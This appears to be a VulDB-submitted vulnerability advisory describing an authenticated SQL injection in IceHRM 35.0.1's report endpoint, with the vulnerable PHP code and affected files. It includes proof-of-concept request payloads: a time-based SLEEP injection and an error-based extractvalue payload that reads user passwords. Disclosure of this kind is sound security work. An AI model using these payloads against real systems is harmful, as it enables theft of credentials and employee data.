| 标题 | gamonoid icehrm 35.0.1 Improper Neutralization of Special Elements in Data Query Logic |
|---|
| 描述 | # Authenticated SQL Injection via Employee Filter in IceHRM Reports
## Summary
IceHRM's report generation module passes JSON-decoded user input directly into SQL `IN` clauses via `implode()` without any parameterization or integer validation. Any authenticated user (including the "Employee" role) can exploit this through the `UserReport` endpoint to exfiltrate database contents.
## Affected Components
- **Repository**: gamonoid/icehrm
- **Commit**: e75ed7e
- **Primary file**: `core/src/Reports/User/Reports/EmployeeAttendanceReport.php`, line 37
- **Also affected** (same pattern): `Reports/User/Reports/OvertimeReport.php:21`, `Reports/Admin/Reports/EmployeeAttendanceReport.php:37`, `Reports/Admin/Reports/EmployeeLeavesReport.php:56-66`, `Reports/Admin/Reports/ExpenseReport.php:44`, and others
- **Entry point**: `POST /core/service.php` with `a=add`, `t=UserReport`
## Vulnerability Details
**CWE-89**: Improper Neutralization of Special Elements used in an SQL Command
**Type**: Authenticated SQL Injection
**CVSS:3.1**: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N — **8.8 (High)**
### Vulnerable Code
`core/src/Reports/User/Reports/EmployeeAttendanceReport.php:28-43`:
```php
if (!empty($request['employee'])) {
$employeeList = json_decode($request['employee'], true);
}
// ...
if (!empty($employeeList)) {
$query = "where employee in (".implode(",", $employeeList)
.") and in_time >= ? and out_time <= ? order by in_time desc;";
$params = array(
$request['date_start']." 00:00:00",
$request['date_end']." 23:59:59",
);
}
```
`$employeeList` values are directly interpolated into the `IN` clause with no integer casting or validation. The resulting query is executed via ADODB's `Execute()`.
### Auth Level Required
`service.php:25-33` allows any user whose `user_level` is in `['Admin','Manager','Employee','Restricted Admin','Restricted Manager','Restricted Employee','Anonymous']`. Employee-level access suffices.
The `UserReport` path (line 29 of `ReportHandler.php`) uses classes from `Reports\User\Reports\` which include `EmployeeAttendanceReport`.
### Proof-of-Concept
**Time-based blind SQL injection**:
```
POST /core/service.php
a=add&t=UserReport&id=<valid_user_report_id>&employee=["1 AND SLEEP(5) -- "]&date_start=2024-01-01&date_end=2024-12-31
```
Resulting SQL:
```sql
WHERE employee in (1 AND SLEEP(5) -- ) AND in_time >= ? AND out_time <= ?
```
**Error-based exfiltration** (MySQL):
```
employee=["1 AND extractvalue(1,concat(0x7e,(SELECT password FROM Users LIMIT 1)))-- "]
```
## Impact
- Full read access to all database tables (users, employees, salaries, attendance, documents).
- Write access if the DB user has INSERT/UPDATE privileges.
- Data exfiltration via time-based or error-based blind injection. |
|---|
| 来源 | ⚠️ https://github.com/gamonoid/icehrm |
|---|
| 用户 | geochen (UID 78995) |
|---|
| 提交 | 2026-05-24 04時50分 (2 月前) |
|---|
| 管理 | 2026-07-11 11時53分 (2 months later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 377783 [IceHRM 直到 35.0.1 UserReport Endpoint EmployeeAttendanceReport.php employeeList SQL注入] |
|---|
| 积分 | 20 |
|---|